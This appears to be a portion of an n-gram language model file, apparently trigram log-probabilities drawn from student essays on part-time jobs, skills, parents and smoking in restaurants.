-0.9404519 them valuable practical
-0.9707589 internships , practical
-0.877244 student see practical
-1.2339287 to develop practical
-2.2924817 <s> The experiences
-0.8441873 , practical experiences
-1.5643188 <s> These experiences
-0.862839 the educational experiences
-0.9461372 unstructured social experiences
-0.9424741 great learning experiences
-0.8441873 with invaluable experiences
-1.1412889 <s> Those experiences
-1.2616045 <s> Another option
-0.96521807 available job offer
-2.0894058 do not offer
-0.9692575 interests and offer
-1.6463622 has to offer
-0.96713555 utmost to offer
-1.6197623 Part-time jobs offer
-0.9569107 student may offer
-2.0279055 <s> They offer
-0.94775486 experience could offer
-0.75314444 be several benefits
-0.75314444 offer several benefits
-0.9665229 conclusion the benefits
-1.5519412 up the benefits
-1.7147784 are many benefits
-0.8873397 The potential benefits
-0.9335651 what other benefits
-0.8441873 show immediate benefits
-1.4046149 <s> Some benefits
-0.7048308 The principle benefits
-1.5927669 that will benefit
-1.1739321 work will benefit
-0.9197259 Others will benefit
-1.3807653 , has benefit
-1.2443275 could also benefit
-1.3518015 the financial benefit
-0.8177979 hold another benefit
-0.89609206 any professional benefit
-1.2857119 the added benefit
-1.0720369 be a part
-1.7447491 having a part
-1.521263 , a part
-1.145143 not a part
-1.0488638 cases a part
-1.475688 in a part
-1.4908571 of a part
-1.145143 has a part
-1.202685 from a part
-0.34968758 working a part
-1.2963437 on a part
-0.83470935 work a part
-0.65079004 have a part
-0.840756 Having a part
-0.84569174 need a part
-1.0488638 doing a part
-0.8755362 get a part
-1.0488638 believe a part
-1.1868877 find a part
-1.9464405 job is part
-2.0274973 and the part
-1.500505 to the part
-2.0695806 on the part
-1.9539262 at the part
-1.2234309 this , part
-1.2234309 often , part
-1.3766057 Moreover , part
-1.2234309 Additionally , part
-1.808915 Firstly , part
-1.5559587 Thirdly , part
-2.357961 , and part
-0.9601441 summers and part
-1.26125 range of part
-2.101918 in their part
-2.101918 to their part
-1.2209332 were studying part
-1.3786697 , working part
-1.2244382 and working part
-0.58397394 By working part
-0.85511935 believe working part
-1.5501357 university students part
-1.1816928 that work part
-1.8768463 to work part
-0.92403084 they work part
-1.1727594 by being part
-1.6208706 to have part
-1.5717242 students have part
-1.077507 should have part
-1.3899235 who have part
-1.5578457 , even part
-0.98059773 an important part
-1.1939646 learned through part
-1.5184757 work at part
-0.9323283 student doing part
-0.91625166 on your part
-1.1899354 and take part
-1.811182 to get part
-0.7772107 <s> A part
-0.80078924 c A part
-0.9451895 Sometimes these part
-1.0400496 a particular part
-0.53893584 could consume part
-1.3904204 <s> Working part
-0.53893584 and pointless part
-1.0400496 an essential part
-0.53893584 the usual part
-1.17519 students had part
-0.53893584 an indispensable part
-0.937617 is indeed part
-0.70149505 for distracting part
-0.8370262 <s> Any part
-1.2079217 time employment lays
-0.96742356 lays the foundation
-0.96742356 lay the foundation
-1.3052491 a real foundation
-0.970309 physics and history
-2.0756483 the work history
-0.9590756 useful for future
-0.9590756 contacts for future
-1.4461963 for the future
-1.4254631 in the future
-2.2278903 to the future
-0.95530033 maturing the future
-1.7029536 with their future
-1.6971843 for their future
-1.3241117 of their future
-0.92981315 shape their future
-0.9425815 chosen -LRB- future
-1.1727114 to my future
-0.9190456 jeopardize my future
-1.0750954 for his future
-1.0750954 to his future
-1.0984732 for her future
-1.0162231 the entire future
-0.9427098 their desired future
-0.5409623 a brighter future
-0.5409623 can tolerate future
-0.94767666 weighed very carefully
-2.283659 students should carefully
-1.4617293 <s> By carefully
-0.77729654 should weigh carefully
-1.2588104 employers will consider
-2.0027337 have to consider
-0.95223993 well to consider
-1.8398224 important to consider
-0.95223993 factor to consider
-1.2341734 impossible to consider
-0.8181321 should carefully consider
-0.94057494 we must consider
-0.8773025 that universities consider
-0.97038597 consider and select
-2.0678182 <s> In order
-1.3971903 , in order
-0.86438 increased in order
-0.86438 accomplish in order
-1.289309 jobs in order
-1.431872 work in order
-0.86438 money in order
-1.0790951 positions in order
-0.86438 ways in order
-0.86438 activities in order
-0.86438 year in order
-0.86438 essential in order
-1.5322751 a valuable skill
-0.9536431 perfected one skill
-0.96616054 valuable work skill
-0.9580523 essential life skill
-0.8884857 <s> f By
-0.8186782 By carefully selecting
-2.5528169 , the gaps
-0.96412337 relationship with academic
-2.0333517 with the academic
-2.1301122 in the academic
-2.0043886 and the academic
-1.8654889 from the academic
-1.385065 outside the academic
-1.265775 spent in academic
-0.96988857 deleterious to academic
-1.6242808 with their academic
-1.5046768 and their academic
-1.9538615 on their academic
-0.91550964 sacrifice their academic
-0.91550964 build their academic
-0.9643865 important as academic
-1.4263175 focused on academic
-1.8247619 not only academic
-0.9328868 improve our academic
-0.9392128 focuses his academic
-0.8171302 just purely academic
-1.5664853 level of qualification
-1.5318627 the academic qualification
-2.2551448 can be minimized
-1.6296837 or not ;
-1.2263513 the studies ;
-1.8452317 in school ;
-1.3925898 of money ;
-1.6804159 the future ;
-0.54052097 be minimized ;
-1.3487473 in society ;
-0.92405874 a living ;
-0.816297 separate arguments ;
-0.95013785 higher education ;
-1.7631538 real world ;
-1.1821191 on campus ;
-0.7038017 can suffer ;
-1.1294426 and independence ;
-0.7754742 individual basis ;
-0.54052097 desired expertise ;
-2.3301516 , it makes
-2.414362 the student makes
-0.9647491 year and makes
-0.9647491 foods and makes
-0.9585812 also experience makes
-1.1818957 smoky environment makes
-2.1357827 <s> This makes
-2.0887165 <s> It makes
-0.54122734 This indirectly makes
-1.2703568 makes the candidate
-0.86392206 a poor candidate
-1.7599955 to be more
-1.5808392 also be more
-1.4958079 could be more
-1.6259205 would be more
-1.45789 and having more
-1.2499466 lead a more
-1.5288647 becoming a more
-1.5547073 studying is more
-0.9462861 change is more
-0.9462861 employee is more
-0.96515733 entrance of more
-1.6034087 a little more
-1.53299 free time more
-0.89254904 ft agree more
-1.8543806 will have more
-1.9313538 they have more
-1.2433991 their money more
-1.6064974 has become more
-0.9571094 days or more
-1.1973464 and even more
-0.8711045 up even more
-1.6957831 students are more
-1.5585768 who are more
-0.9122387 People are more
-0.9122387 smoke are more
-0.8895055 and offer more
-0.7004738 the candidate more
-0.7803752 not spend more
-1.1709386 to spend more
-0.9488013 students spend more
-0.8825364 cards gives more
-1.1863052 to other more
-0.9270141 can take more
-1.1430278 will know more
-0.8997754 educational opportunity more
-0.8811952 has done more
-0.9493133 What fs more
-1.3803583 a lot more
-1.5903656 college life more
-0.8899329 my finances more
-0.857178 still provides more
-0.37896648 to contribute more
-0.83887684 from campus more
-1.2942199 so much more
-0.8710827 become much more
-0.91694707 education was more
-1.0380341 should concentrate more
-1.495875 <s> But more
-0.8565836 are far more
-0.91354114 you want more
-0.880724 was made more
-0.8127947 help concentration more
-0.53823316 to assure more
-0.7004738 can bring more
-0.8811952 and spending more
-0.7004738 and seeing more
-0.95854473 candidate more attractive
-2.0586054 to a potential
-2.4583068 of the potential
-2.3548265 to the potential
-1.5337261 consider the potential
-0.9680855 compromise their potential
-2.3008554 <s> The potential
-0.81796503 the cash potential
-0.91423696 their full potential
-0.9676906 factor that employers
-2.7464805 of the employers
-0.970251 experiences , employers
-1.5938838 , many employers
-1.6429511 ban on employers
-0.9461294 2 -RRB- employers
-1.5805553 , so employers
-1.2316408 the potential employers
-1.6931171 <s> Many employers
-0.5410506 <s> Potential employers
-1.7106184 and it helps
-2.8487937 a part-time helps
-2.0092807 part-time job helps
-2.242168 time job helps
-1.206362 Part-time employment helps
-1.4066516 job also helps
-0.8443649 hotel industry helps
-0.70495963 Practical background helps
-2.0313077 would be better
-2.0486953 having a better
-1.9477454 in a better
-1.439628 gain a better
-2.2116642 have a better
-0.7361337 them a better
-0.9344425 instils a better
-2.166562 It is better
-0.9689299 job the better
-2.3934903 the student better
-1.4757301 , will better
-1.0271429 students will better
-0.8431235 I developed better
-1.5385073 to do better
-1.1809194 students do better
-0.8632767 general do better
-1.7943159 <s> A better
-0.78891027 be much better
-1.038497 is much better
-0.78891027 environment much better
-0.86192465 bridging effect better
-0.86172855 is far better
-0.8437642 I focused better
-0.84053266 I got better
-0.96471906 tie-in with understanding
-1.2654307 foundation for understanding
-1.8237026 well as understanding
-0.95896196 them an understanding
-1.6576517 one 's understanding
-0.9642324 learning or understanding
-0.67678577 a better understanding
-0.9679412 employment , whether
-1.5574268 study , whether
-0.96988934 decision of whether
-1.2699976 as to whether
-1.2092912 worrying about whether
-1.0057982 and decide whether
-2.4549673 in a corporate
-2.797555 of the organization
-0.5415809 a corporate organization
-1.7085686 the same organization
-0.77729654 a service organization
-2.2403214 as a hotel
-0.9652262 organization or hotel
-1.7512143 in the industry
-2.5041761 to the industry
-0.9650539 fields or industry
-0.7054753 or hotel industry
-1.2707573 helps to evolve
-0.9604183 me with skills
-0.9343235 builds valuable skills
-2.5759876 of the skills
-0.9648221 knowledge , skills
-0.9648221 Well , skills
-1.4937348 too many skills
-1.2380977 put their skills
-0.95428586 sharpen their skills
-0.9508152 effective study skills
-0.8236025 <s> Such skills
-2.1895845 <s> The skills
-1.2518615 These are skills
-0.8392449 develop practical skills
-1.1927592 their academic skills
-0.8255273 our academic skills
-0.53876007 to evolve skills
-1.5402018 <s> These skills
-0.3409608 the leadership skills
-0.3409608 include leadership skills
-0.37923184 and interpersonal skills
-1.339161 time management skills
-0.81367016 and increase skills
-1.2812432 the people skills
-1.1024694 and people skills
-0.8784866 Those people skills
-0.9480985 -LRB- what skills
-0.7668956 and social skills
-0.7198294 building social skills
-0.7198294 stronger social skills
-0.7198294 communicative social skills
-0.9535544 and life skills
-1.2785089 their personal skills
-0.8209372 improve these skills
-0.8209372 practice these skills
-0.8209372 All these skills
-0.53876007 and transferable skills
-0.53876007 fre countless skills
-0.53876007 readily apparent skills
-1.0412586 to finding skills
-0.9452047 students learn skills
-0.9126212 of workplace skills
-0.8392449 mastering basic skills
-1.3093265 to obtain skills
-0.53876007 which managerial skills
-1.0386164 are invaluable skills
-0.53876007 and employability skills
-0.53876007 and time-management skills
-0.962609 deem it important
-0.4996372 it is important
-1.0963347 job is important
-1.4032688 studying is important
-1.2694736 It is important
-0.9037935 Suffering is important
-0.9037935 timing is important
-0.9037935 eIt is important
-1.2794907 is not important
-0.966031 beneficial and important
-0.44223198 is very important
-0.7271976 college very important
-1.0157851 are very important
-0.7271976 fs very important
-0.96237063 almost as important
-1.8083255 is also important
-0.51687723 is an important
-1.437981 as an important
-0.87807935 now an important
-1.804116 not only important
-0.62290335 is so important
-0.8284021 it 's important
-0.79777956 is most important
-0.72786295 the most important
-0.9747011 The most important
-1.6892259 that are important
-0.9514374 things are important
-0.80976206 <s> Another important
-0.61039853 is more important
-0.91796637 become more important
-0.9539171 evolve skills important
-0.84191966 are all important
-0.8838247 them teach important
-0.6830955 it fs important
-0.9467313 teach these important
-1.8778279 to learn important
-0.77396137 is extreme important
-0.5396396 not necessarily important
-0.77396137 is personally important
-0.93938166 is indeed important
-0.5396396 fs terribly important
-2.5457652 , the employer
-2.313727 <s> The employer
-0.8883211 a potential employer
-1.2445872 skills may include
-0.93952686 Said activities include
-0.8184666 These factors include
-1.2703568 them the leadership
-0.7775762 may include leadership
-1.7434075 skills , commitment
-1.4434808 terms of commitment
-2.2403214 as a team
-1.270913 commitment , team
-0.70563835 , team spirit
-1.2677768 training in interpersonal
-0.9657898 spirit and interpersonal
-0.9657898 service and interpersonal
-2.540267 , the management
-0.87694967 , time management
-1.5480571 of time management
-0.90610564 to time management
-1.3789517 fs time management
-0.937816 personal financial management
-0.87756544 studying business management
-2.1401095 college student taking
-0.92122644 tuition by taking
-0.92122644 simply by taking
-0.96439314 management and taking
-1.2577398 themselves and taking
-1.5625224 costs of taking
-1.2526901 refrain from taking
-1.6749262 many students taking
-1.6015491 of students taking
-1.779791 you are taking
-0.9130451 truly enjoy taking
-0.89552355 tried just taking
-0.89552355 graduate since taking
-1.1723425 and taking criticism
-0.5417812 taking criticism positively
-0.966677 Besides the knowledge
-1.4358697 which the knowledge
-1.2442768 have more knowledge
-1.5166019 on my knowledge
-0.5413157 themselves acquiring knowledge
-0.8443649 gaining invaluable knowledge
-0.5413157 any REAL knowledge
-1.6165302 the experience gained
-0.95710313 time-management skills gained
-1.1193186 the knowledge gained
-1.4983077 after graduation through
-2.7804086 part time through
-0.7753227 knowledge gained through
-0.9320446 support themselves through
-0.59713745 are learned through
-0.8428676 money earned through
-0.95721966 support them through
-1.2033707 the society through
-0.54043275 are met through
-0.8040625 their way through
-0.8040625 my way through
-0.44136035 must go through
-1.3996488 <s> Working through
-0.9195662 education right through
-0.8161305 to pass through
-0.7036732 environment goes through
-0.7753227 own kids through
-0.54043275 or daughters through
-1.2691678 through the educational
-1.4283475 fees and educational
-1.4283475 books and educational
-0.9680855 appreciate their educational
-0.9528268 of some educational
-0.8445425 of his\/her educational
-0.8446352 Attending tertiary educational
-2.1060765 a student who
-0.9389484 The student who
-0.96883214 People , who
-1.6444998 for students who
-1.2313132 , students who
-1.2448311 to students who
-0.86371535 from students who
-1.078006 The students who
-1.2197859 fellow students who
-0.86371535 than students who
-0.86371535 poor students who
-1.9906181 part-time jobs who
-1.1893197 of jobs who
-2.1460001 , or who
-0.702775 pursuing candidates who
-0.8997171 on employers who
-1.1244714 with people who
-1.2156218 of people who
-0.83519536 elderly people who
-0.83519536 employ people who
-1.1356956 <s> People who
-0.8736195 the workers who
-0.91844666 on customers who
-0.3074312 of those who
-0.7106808 to those who
-0.605579 help those who
-0.605579 Beware those who
-0.702775 a worker who
-0.8926364 and families who
-1.232578 <s> Students who
-0.8149672 that anyone who
-1.5013487 a person who
-0.8149672 my co-workers who
-1.1356956 <s> Those who
-0.8149672 the groups who
-0.702775 are individuals who
-0.5398157 <s> Anyone who
-0.9398239 restaurant patrons who
-0.81542623 , non-smokers who
-0.9653459 was not productive
-0.9680855 through their productive
-1.8633671 to become productive
-1.8810347 who are productive
-1.2446644 a more productive
-1.268888 do something productive
-2.700372 <s> I developed
-2.2438025 can be developed
-0.9377899 with well developed
-1.4047122 people skills developed
-1.3439867 many other developed
-0.97076845 hamstring the overall
-0.84522486 well developed overall
-0.7054753 developed overall personality
-0.91436857 their individual personality
-0.54166937 materialistic inclined personality
-0.60063684 will be able
-0.83661413 not be able
-0.6809103 to be able
-0.9903599 may be able
-1.2472117 should be able
-1.0769796 only be able
-0.7372119 must be able
-0.81015027 n't be able
-1.2679627 would be able
-0.81015027 t be able
-1.937033 student is able
-0.9614467 everyone is able
-2.0280538 is not able
-0.9429684 was then able
-0.95055217 was only able
-1.5890334 and are able
-1.6126069 they are able
-0.90841216 you were able
-1.6266937 I was able
-0.7427083 <s> Being able
-2.4882603 able to assimilate
-1.6058713 money for themselves
-0.95834273 identity for themselves
-1.2567652 earn it themselves
-2.0912766 are not themselves
-0.9561014 live by themselves
-0.87516296 such positions themselves
-0.54043275 to assimilate themselves
-0.87495136 students see themselves
-0.7036732 into keeping themselves
-0.88557863 ft teach themselves
-1.4843823 to support themselves
-1.1389889 to manage themselves
-0.7036732 likely manifest themselves
-0.54043275 can situate themselves
-0.54043275 only hurting themselves
-0.54043275 fully dedicating themselves
-0.54043275 without exposing themselves
-0.607943 be smokers themselves
-0.607943 the smokers themselves
-2.5293126 , and into
-0.9307448 assimilate themselves into
-0.6550727 to put into
-1.1738988 the effort into
-0.81542623 , fit into
-1.1133988 are entering into
-0.859884 until late into
-0.774821 translate directly into
-1.2262087 they enter into
-0.702775 and classrooms into
-0.5501161 and insight into
-0.5501161 added insight into
-0.5398157 about assimilation into
-0.5398157 their toes into
-0.5398157 be converted into
-0.81542623 students mature into
-1.0015004 be taken into
-0.702775 easily turn into
-0.5398157 valuable input into
-0.8149672 carry over into
-0.702775 more women into
-0.5398157 all energies into
-0.8387759 be divided into
-0.5398157 be pressured into
-0.5398157 deeply integrated into
-0.9578491 maintain this environment
-1.7146847 into the environment
-0.9660607 Even the environment
-0.9610377 smoke-free working environment
-0.9530137 his school environment
-1.9698844 the work environment
-0.9497381 her work environment
-0.9260394 choose an environment
-0.9260394 creating an environment
-2.1288831 <s> This environment
-1.0456167 a healthy environment
-0.8410611 a smoke-free environment
-0.38033938 a smoky environment
-0.5409623 a smoke-filled environment
-2.0572052 can be learned
-2.1121125 to be learned
-2.1795077 they have learned
-0.9473085 practices you learned
-1.6168703 that are learned
-1.3519534 skills are learned
-0.93727094 ethics are learned
-2.0311003 <s> They learned
-0.7050885 the theory learned
-2.0506668 for a position
-1.6053771 such a position
-1.2457142 secure a position
-0.9605936 through part-time position
-0.887796 a graduate position
-0.7050885 for each position
-0.77699226 the manager position
-0.54140407 and humble position
-0.96544003 position will expand
-0.96997774 expand and increase
-0.9484744 but could increase
-0.8966985 would never increase
-0.5415809 the continual increase
-1.566105 skills and abilities
-2.3120105 in their abilities
-1.6613173 one 's abilities
-0.9576363 try it at
-2.0127695 will be at
-0.95615315 works part-time at
-2.385743 it is at
-0.95421904 mind is at
-1.9985424 are not at
-1.4216887 interested in at
-1.057089 and study at
-1.4531772 to study at
-0.8508254 doing study at
-1.2621901 for example at
-1.5873288 a little at
-0.95070475 students experience at
-1.1230037 for working at
-0.89062965 are working at
-0.89062965 continue working at
-1.7981873 their time at
-0.94447577 my time at
-2.2044094 part-time jobs at
-1.2536495 can work at
-1.1335274 not work at
-1.7184393 to work at
-0.89676166 real work at
-0.9319394 study then at
-2.084779 of money at
-1.5304801 the most at
-0.8859713 business degree at
-0.9353974 government or at
-0.9353974 schools or at
-0.87775147 have learned at
-0.7687077 and abilities at
-0.90377986 on food at
-1.1942582 are good at
-0.6818618 part-time while at
-1.1303331 job while at
-0.6818618 tuition while at
-0.6818618 workplace while at
-0.94956976 life all at
-0.934515 school because at
-1.1776385 also provide at
-0.8531268 are usually at
-0.7687077 are staying at
-0.8531268 up late at
-1.2890396 of customers at
-0.89322567 in success at
-0.90771955 free days at
-1.3690379 a week at
-0.9068736 going home at
-0.86740685 they obtain at
-0.87043726 financial discipline at
-0.5365689 who interns at
-0.80886924 time needed at
-1.0607953 and live at
-0.5365689 be impressed at
-0.88658917 years spent at
-1.0332845 the public at
-1.169414 to look at
-0.8859713 puts me at
-0.8348791 a goal at
-1.4555247 be banned at
-0.8398179 as dealing at
-0.5365689 tour guides at
-0.5365689 family unit at
-0.5365689 a course-load at
-0.6980578 greater population at
-0.5365689 quite shocked at
-0.83233684 to perform at
-0.6980578 left solely at
-0.5365689 be mesmerized at
-0.5365689 of winning at
-0.5365689 <s> Troubles at
-1.1238561 to eat at
-1.4634807 on smoking at
-0.93096304 inhaling smoke at
-1.741608 , this same
-1.9209192 is the same
-1.4147052 in the same
-1.488517 of the same
-0.6336835 at the same
-0.4505812 At the same
-1.7929323 same time benefiting
-2.0477881 not be financially
-0.9692575 professionally and financially
-1.198633 to become financially
-0.9337215 keeping themselves financially
-0.54122734 time benefiting financially
-1.8013906 <s> A financially
-1.2081527 <s> Being financially
-0.54122734 to succeed financially
-1.7489916 statement for two
-0.95956486 mainly for two
-1.647099 I have two
-1.4942087 the following two
-0.91353816 There are two
-0.94377345 divided into two
-1.6925907 For these two
-1.0172796 <s> Reason two
-1.546171 when I first
-1.257892 make it first
-2.0267794 for the first
-1.4526637 be the first
-1.823614 is the first
-2.0024896 in the first
-2.0019011 to the first
-1.3550861 are the first
-1.2081964 probably the first
-0.91522247 students their first
-1.9524171 on their first
-1.2968369 have their first
-1.165879 get their first
-0.91522247 enter their first
-1.5193979 to experience first
-0.9167577 also gain first
-1.1378605 <s> The first
-1.6233823 that you first
-0.9202279 have your first
-0.93920004 context must first
-0.92067075 own way first
-0.91870147 had my first
-0.91870147 remember my first
-1.3600122 <s> My first
-2.0222545 is the issue
-2.3548265 to the issue
-2.2021053 on the issue
-0.95916915 not an issue
-1.9369822 the money issue
-0.946515 important social issue
-0.77699226 a big issue
-0.54140407 a safety issue
-0.9710474 examinations , Many
-2.71242 college students complain
-1.965147 <s> I don
-1.6357412 , I don
-1.7295498 students that don
-1.384283 that they don
-1.9166504 if they don
-1.1975414 since they don
-1.5638076 students who don
-1.4838587 those who don
-1.2363868 jobs we don
-1.8565267 they can ft
-1.3725996 This can ft
-0.07205923 I don ft
-0.18486251 that don ft
-0.07205923 they don ft
-0.2218242 who don ft
-0.18486251 we don ft
-0.34211367 you didn ft
-0.34211367 University didn ft
-0.541139 there wasn ft
-0.541139 , isn ft
-0.541139 I couldn ft
-0.541139 or aren ft
-0.704702 it won ft
-0.541139 <s> Don ft
-0.94291425 Not having enough
-0.9673534 graduating is enough
-1.7016393 is not enough
-1.1800374 have not enough
-0.92311543 simply not enough
-1.4981924 ft have enough
-1.382527 They have enough
-0.9275952 wasn ft enough
-0.9402063 were good enough
-0.89437205 ft earn enough
-0.7036732 is stressful enough
-0.7753227 anyone fortunate enough
-0.7753227 force soon enough
-1.2420326 to save enough
-0.7753227 moving fast enough
-0.46936065 also old enough
-0.46936065 are old enough
-0.54043275 rarely adequate enough
-0.54043275 as devoting enough
-0.54043275 and enlightened enough
-0.7036732 it justified enough
-2.0004852 they can spend
-1.6321256 and not spend
-1.8970238 , and spend
-1.2566923 together and spend
-1.7603564 student to spend
-2.1205804 students to spend
-1.8006306 time to spend
-1.8228074 have to spend
-1.6349258 money to spend
-1.8896284 able to spend
-1.7368354 how to spend
-1.7035109 want to spend
-1.496278 had to spend
-2.083779 , students spend
-1.7886604 College students spend
-1.4044526 student should spend
-1.2069057 students should spend
-1.3283519 They should spend
-1.6475402 time they spend
-1.578204 <s> To spend
-1.2338916 Students who spend
-1.3773141 I could spend
-1.2095486 they must spend
-0.8757142 is either spend
-1.4057393 , we spend
-0.90457416 as we spend
-2.1070404 with the food
-2.1194887 on the food
-1.2412089 what the food
-1.5124046 appreciate the food
-0.9677393 rent , food
-0.9677393 expensive , food
-0.7550275 taste of food
-1.2695328 close to food
-0.96491635 even on food
-0.7768402 of fast food
-0.7768402 only buy food
-0.90350926 , several times
-1.2671331 than in times
-0.96125305 food at times
-0.9602002 <s> Often times
-0.70521736 long vacation times
-0.96518874 Firstly it gives
-1.6152257 working part-time gives
-2.7239869 part-time job gives
-0.9704541 treasurer , gives
-0.9573194 it also gives
-2.1357827 <s> This gives
-1.2855114 credit cards gives
-0.7048308 same dorm gives
-1.4693154 of this need
-0.9236387 recognize this need
-1.909512 have the need
-0.96513784 : the need
-0.9630958 he\/she will need
-0.9379226 backgrounds often need
-0.9677806 more in need
-0.96764123 between and need
-1.5452029 that students need
-1.6418297 , students need
-1.4314951 some students need
-1.3202331 Many students need
-1.5258871 College students need
-1.2462543 where students need
-1.5112606 they may need
-0.9516817 experience they need
-0.9516817 all they need
-1.3729242 when you need
-1.2326082 jobs who need
-1.7261695 don ft need
-1.3326976 have no need
-1.4825444 work force need
-1.6570023 they would need
-1.5752801 , we need
-0.7753227 we essentially need
-1.4138292 such an emergency
-1.9190799 it is earned
-1.4582977 they have earned
-1.9395137 the money earned
-0.9133842 it be good
-1.5988303 also be good
-1.1626104 ft be good
-1.6482654 would be good
-1.6267211 with a good
-1.7321067 for a good
-1.3368195 is a good
-1.6828386 to a good
-1.3940566 also a good
-0.9196823 what a good
-0.9196823 securing a good
-0.9196823 landing a good
-1.4150039 restaurant is good
-1.684218 college is good
-2.5029414 for the good
-1.507238 so many good
-1.4362842 well and good
-0.9693064 skills to good
-1.3732891 a very good
-1.5836222 jobs are good
-2.1429422 they are good
-1.256222 <s> Another good
-0.95569086 done more good
-1.6081334 are all good
-0.816297 Yet another good
-1.5088508 It fs good
-0.90709645 parents were good
-0.92305744 essentially getting good
-0.9582416 though this idea
-1.531088 with the idea
-2.3445199 to the idea
-1.251605 support the idea
-1.324955 with little idea
-1.4165332 students an idea
-0.8958022 a bad idea
-1.6501068 a better idea
-0.7807752 a good idea
-0.86992687 very good idea
-1.9622105 student fs idea
-0.704702 a clear idea
-1.8513768 <s> The alternative
-0.96952754 alternative is asking
-0.6216845 work with others
-0.9465366 cooperation with others
-1.5127591 too many others
-1.2678394 work of others
-0.9647886 depend on others
-0.54122734 is asking others
-0.8408907 with what others
-1.041224 know what others
-0.8408907 Learning what others
-0.9415853 simply because others
-0.54122734 as innumerable others
-2.3346918 it is like
-1.7608058 which is like
-0.9503656 world is like
-2.2744412 and the like
-1.268922 others , like
-0.95947033 are jobs like
-0.9423709 job -LRB- like
-0.93667525 free society like
-0.7763553 Many countries like
-0.540874 <s> Skills like
-0.70431596 may seem like
-0.84088486 I fd like
-0.5439482 it seems like
-0.4696766 It seems like
-0.540874 really tastes like
-2.203667 believe that parents
-2.3872576 , the parents
-2.5675411 of the parents
-0.95626426 financed by parents
-1.2561839 with their parents
-0.7982185 by their parents
-1.2212183 and their parents
-1.43866 of their parents
-1.1730635 to their parents
-1.2463851 from their parents
-0.70240134 on their parents
-0.8148489 if their parents
-0.8148489 what their parents
-0.8148489 If their parents
-0.8148489 either their parents
-0.8148489 ask their parents
-0.8148489 relieve their parents
-1.5898677 Even if parents
-1.57691 student 's parents
-0.9227331 , like parents
-1.1143057 to your parents
-0.8037615 namely your parents
-2.0331855 <s> If parents
-1.9475929 student fs parents
-0.9553752 up my parents
-0.9415976 those whose parents
-1.3774618 <s> All parents
-0.93182623 shows our parents
-0.93819946 -LRB- his parents
-0.84276944 make his\/her parents
-0.94625086 true with friends
-1.3756826 out with friends
-1.2666358 people and friends
-0.96924686 circle of friends
-1.6341349 parents or friends
-1.1812391 meet new friends
-1.1730202 with my friends
-1.3926731 of my friends
-1.3616256 <s> My friends
-0.9330992 with our friends
-0.8762872 life long friends
-0.5410506 equally dissolute friends
-2.3674161 should be doing
-0.96763766 who is doing
-2.3901072 the student doing
-1.6105182 jobs , doing
-1.8886168 However , doing
-1.6036335 classes , doing
-1.8256295 Finally , doing
-2.0960011 are not doing
-1.67648 job and doing
-1.3833244 working and doing
-1.9119481 money and doing
-0.9490781 suffering and doing
-0.96860534 love of doing
-0.9610221 them from doing
-1.9717906 their time doing
-1.5370073 class or doing
-2.1264775 students are doing
-1.4546872 <s> By doing
-0.94075286 things while doing
-0.94409525 ended up doing
-1.1300274 time spent doing
-0.970158 again and again
-0.9454653 though there again
-0.9537528 doing so again
-0.96979755 market and put
-2.1149364 able to put
-1.8123507 need to put
-0.7890246 chance to put
-0.95223993 where to put
-0.95223993 aside to put
-0.957354 again may put
-1.6828659 help them put
-0.70521736 you fve put
-0.95353854 put some strains
-2.3601747 on the relationships
-0.70521736 in interpersonal relationships
-0.70521736 developing crucial relationships
-0.6543796 , workplace relationships
-0.6543796 successful workplace relationships
-0.6543796 understand workplace relationships
-0.5414925 Maintaining friendly relationships
-1.3228685 work with people
-0.91617036 team with people
-1.5634973 dealing with people
-1.2412227 common for people
-1.2412227 respect for people
-0.9642925 so that people
-2.0524366 with the people
-2.1292012 , the people
-2.2404306 of the people
-1.8790464 from the people
-1.4281087 , many people
-1.3701215 so many people
-1.679733 students and people
-0.9596159 ethic and people
-1.5192499 lot of people
-1.5192499 kind of people
-1.4487689 variety of people
-0.93727815 failures of people
-1.2059739 thousands of people
-0.9575465 Learning from people
-0.9608983 else as people
-1.5171813 <s> Such people
-1.3112869 and less people
-0.96215737 At college people
-1.2125452 for most people
-1.2795508 <s> Most people
-1.2134234 <s> Many people
-1.5738908 , when people
-0.8378567 for other people
-0.8378567 affect other people
-0.9536442 indeed all people
-1.7544272 to make people
-0.93266106 to where people
-0.8580218 with different people
-0.5386722 <s> Young people
-0.9637222 <s> Some people
-0.68194395 : Some people
-0.88210607 will meet people
-1.1712654 meet new people
-0.925938 how hard people
-0.4732363 that young people
-0.3239365 often young people
-0.3239365 to young people
-0.3239365 on young people
-0.3239365 -RRB- young people
-0.3239365 Most young people
-0.3757097 are young people
-0.20915101 help young people
-0.3239365 other young people
-0.3239365 all young people
-0.3239365 If young people
-0.3239365 give young people
-0.77230334 fully rounded people
-1.3649172 <s> All people
-1.1312034 <s> Those people
-0.70111173 , meeting people
-0.5386722 meeting viable people
-0.5386722 middle aged people
-0.5386722 even elderly people
-0.5386722 who employ people
-0.5386722 to urge people
-1.0819182 the rights people
-2.188469 they have borrowed
-0.9480385 people you borrowed
-2.4251864 the student eventually
-1.7103466 students and eventually
-0.96528363 tired and eventually
-1.2440147 They may eventually
-1.2364699 jobs who eventually
-0.959137 we all eventually
-2.4215481 the student see
-0.9673672 others to see
-0.9673672 traveling to see
-2.1019545 the students see
-2.169887 if they see
-0.8632097 may eventually see
-1.187737 ft really see
-2.2413182 as a evampire
-0.5417812 a evampire f.
-0.54174346 evampire f. This
-2.0188417 This is especially
-2.2847667 job , especially
-2.6527693 , and especially
-0.81796503 very carefully especially
-0.9031918 many employers especially
-1.2482055 many people especially
-0.9689191 contrary is true
-2.3205123 in the true
-0.9617173 some the true
-0.9617173 load the true
-0.86329037 is especially true
-0.81796503 be particularly true
-0.93394995 understating our true
-0.54140407 f rings true
-2.1018894 Secondly , College
-0.9567716 Too many College
-0.9384203 graduate from College
-0.9384203 fully from College
-1.2242466 and will show
-0.9470251 skills will show
-1.1523242 need to show
-1.2458496 could also show
-1.4636977 that they fre
-1.6316563 that you fre
-2.014209 <s> There fre
-1.0063916 they fre putting
-0.54174346 already started putting
-2.1557462 and the effort
-2.4666588 of the effort
-0.9620223 putting the effort
-1.218777 without any effort
-1.7371128 time and effort
-1.565553 lack of effort
-0.9655786 skills as keeping
-0.94453824 effort into keeping
-1.7393312 become a stable
-0.89702827 themselves financially stable
-1.4357537 parents are willing
-1.5216873 are more willing
-0.5846666 job can help
-1.2329338 and can help
-0.88753194 coursework can help
-0.88753194 relief can help
-1.0391723 experience will help
-1.0391723 studies will help
-0.83959603 developed will help
-0.83959603 It will help
-0.83959603 workplace will help
-0.83959603 hierarchies will help
-1.4254817 did not help
-1.3848963 experience to help
-1.5702535 money to help
-1.6550907 order to help
-1.4647224 enough to help
